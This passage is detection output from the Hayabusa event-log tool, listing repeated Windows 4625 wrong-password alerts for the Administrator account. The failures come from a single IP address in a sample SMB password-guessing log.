NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yA7pIDFgQbLIInqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 84g2gO0253Ut4O1O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DRkFX9WTAhBZ8jc8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuoQAi4k3XZPaf4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KjKMhCnbR0uFT0av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lfwqPB0AgTfIOt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mJuG26pQzdjUQael : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXwEziYTA3DkkFVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CHr6dirvkT8B9ZVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B5eSMLiF4BsfY3xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64ISDuFRhR6cFYVQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcprXytyuBw380XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxfQWiSIhZYxwNjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FcL982boDelzeyzK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBAAjRdaR8U0tqt7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EmqUjcltAW6StHQJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 129Rp3HCmRVRXw3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jpIIQP2oWEF51EBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HREGh5ppEkLAuEob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVkpQvotEMfM8R0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm6uHEy5RJJBJ6FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPTyAkYjcIlko5lu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OjlRoo9Sot4Fx4Th : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XslY26kw2aBw19D8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1404fakprYeqGiNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2VfIjtBcXCRlOjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPztyX4J9NV8EldT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 07flrrzWgsVBYaN2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vgkqkC1VvznGxR6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hMn6yDMLgLChJTL6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uSTokOJ31Tj0bLXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyRifC46GrNpTA4x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvNaby30vAT9drAX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wkYSOQ2bD51a4U8l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rqdOquL9Ax01RPPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nqCCiK5arcyRHha6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpyTGZLkAb0w0kgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wa2pXrZKxeZZYKAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dK0N5KeBgCze1YWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g4dHlwZjMzI5wU2s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GzF2ouP5KkRfsxnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSQxMrGlDiAOo6ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gL0rz3p1yG6RhfAT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyChoTSKgJeK6yqs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG4I11dwpBM9SM3l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7foAZ5Y1igCbHap : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ATDXUljQwg8WvUVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdmXaJqQMAG2g6Ao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bjame5puT5CDeoIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0FGGVVkckmdURVh6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j0Smqw4cA4wG2Q6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLWloOhUYEQlj6y6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Tuxuykh0j5afeTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeXS6QwYhqJAOeuz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AqFSJCq5bmBW6dj1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DH1zyt1hxTgzajhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rrZxcWjUX4OgYYIb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ExtkYXSJI8F41uvw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sLh1Q3RieOoukiCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kNb2hZDxi4QrbQpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCb1TMlFj2PjH2sA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rgF42C57Nx6F3HU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KZfFH9geIrxVYowJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWz1XeyxywR0o5gS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: og1kItEC6WhqXF37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0KhaJlD6tWwF2ky : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUy0EKmjyD6ZYENA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h3MdGstPPFJDGzwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTs0ZQa6LGrKZKsY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FefzWjMXSvMdvqcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnUt9tPRSXR5mWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dehb4M6pcxi56Bkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tLXHvGiUqZyxax4W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP1gKcf1eeKm0RB1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldbN1odP77n0BOzO : IP Address: 192.168.198.149 : AuthPackage: 